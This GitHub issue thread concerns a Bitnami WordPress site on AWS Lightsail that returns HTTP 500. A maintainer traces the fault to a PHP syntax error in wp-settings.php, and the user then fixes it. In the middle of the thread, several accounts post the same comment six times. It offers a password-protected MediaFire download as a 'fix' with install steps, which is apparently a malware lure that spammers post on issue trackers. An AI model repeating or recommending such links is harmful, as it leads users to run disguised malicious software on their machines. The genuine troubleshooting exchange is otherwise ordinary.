### ISSUE TITLE
[Wordpress] Bitnami Wordpress is Not responsive

### ISSUE THREAD

**Issue by Charlsoun** [bitnami/vms#1644]
### Platform

AWS

### bndiagnostic ID [know more about bndiagnostic ID](https://docs.bitnami.com/general/how-to/understand-bndiagnostic/)

49bde6ae-bad6-142e-cda6-d98ef9fb5fc5

### bndiagnostic output

[Wed Aug 28 07:09:19.682990 2024] [mpm_event:notice] [pid 3661:tid 140356400539392] AH00491: caught SIGTERM, shutting down
[Wed Aug 28 07:10:43.572896 2024] [ssl:warn] [pid 1919:tid 140273490700032] AH01909: localhost:443:0 server certificate does NOT include an ID which matches the server name
[Wed Aug 28 07:10:43.598148 2024] [ssl:warn] [pid 1920:tid 140273490700032] AH01909: localhost:443:0 server certificate does NOT include an ID which matches the server name
[Wed Aug 28 07:10:43.598742 2024] [mpm_event:notice] [pid 1920:tid 140273490700032] AH00489: Apache/2.4.34 (Unix) OpenSSL/1.0.2o configured -- resuming normal operations
[Wed Aug 28 07:10:43.598777 2024] [core:notice] [pid 1920:tid 140273490700032] AH00094: Command line: '/opt/bitnami/apache2/bin/httpd.bin -f /opt/bitnami/apache2/conf/httpd.conf -D DISABLE_BANNER'
[Wed Aug 28 07:11:05.264251 2024] [negotiation:error] [pid 1921:tid 140273170482944] [client 183.100.115.92:54087] AH00687: Negotiation: discovered file(s) matching request: /opt/bitnami/apps/wordpress/htdocs/index.html (None could be negotiated).
[Wed Aug 28 07:11:39.014017 2024] [proxy_fcgi:error] [pid 1921:tid 140273036199680] [client 91.219.214.131:52662] AH01071: Got error 'PHP message: PHP Parse error:  syntax error, unexpected ''w' (T_ENCAPSED_AND_WHITESPACE) in /opt/bitnami/apps/wordpress/htdocs/wp-settings.php on line 1406\n'
[Wed Aug 28 07:12:27.203045 2024] [proxy_fcgi:error] [pid 2181:tid 140273212446464] [client 209.141.54.224:46792] AH01071: Got error 'PHP message: PHP Parse error:  syntax error, unexpected ''w' (T_ENCAPSED_AND_WHITESPACE) in /opt/bitnami/apps/wordpress/htdocs/wp-settings.php on line 1406\n'
[Wed Aug 28 07:14:41.991011 2024] [negotiation:error] [pid 2181:tid 140273178875648] [client 149.50.103.48:36726] AH00687: Negotiation: discovered file(s) matching request: /opt/bitnami/apps/wordpress/htdocs/index.html (None could be negotiated).
[Wed Aug 28 07:14:43.894751 2024] [negotiation:error] [pid 1921:tid 140273145304832] [client 198.235.24.103:64054] AH00687: Negotiation: discovered file(s) matching request: /opt/bitnami/apps/wordpress/htdocs/index.html (None could be negotiated).
[Wed Aug 28 07:14:58.421661 2024] [negotiation:error] [pid 2181:tid 140273162090240] [client 205.210.31.19:57860] AH00687: Negotiation: discovered file(s) matching request: /opt/bitnami/apps/wordpress/htdocs/index.html (None could be negotiated).

### bndiagnostic was not useful. Could you please tell us why?

I could not find my specific issue on the suggested solutions

### Describe your issue as much as you can

After the updates, my WP website become not responsive.
My AWS Lightsail server is alive. Other html documents attached with the server is perfectly working.
However, only the WP are not working.
My AWS Lightsail is some what an old version and as a result, i do not have bndagnostic but i have bnsupport

Please help me to solve this problem.

**Comment by Charlsoun** [comment]
Add : my site shows "HTTP ERROR 500" and all links related to WP are not working

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Dnts1** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jotamartos** [comment]
>[Wed Aug 28 07:12:27.203045 2024] [proxy_fcgi:error] [pid 2181:tid 140273212446464] [client 209.141.54.224:46792] AH01071: Got error 'PHP message: PHP Parse error: syntax error, unexpected ''w' (T_ENCAPSED_AND_WHITESPACE) in /opt/bitnami/apps/wordpress/htdocs/wp-settings.php on line 1406\n'

It seems there is a syntax error in one of the app's files. Can you take a look at that? The WordPress' forums should have more information regarding how to solve this type of issues.

**Comment by Charlsoun** [comment]
Thank you!

I started compare the file with the working Wordpress and modified wp-settings.php.

And It worked!! Thank you very much and you are my life saviour! :)))

> > [Wed Aug 28 07:12:27.203045 2024] [proxy_fcgi:error] [pid 2181:tid 140273212446464] [client 209.141.54.224:46792] AH01071: Got error 'PHP message: PHP Parse error: syntax error, unexpected ''w' (T_ENCAPSED_AND_WHITESPACE) in /opt/bitnami/apps/wordpress/htdocs/wp-settings.php on line 1406\n'
> 
> It seems there is a syntax error in one of the app's files. Can you take a look at that? The WordPress' forums should have more information regarding how to solve this type of issues.
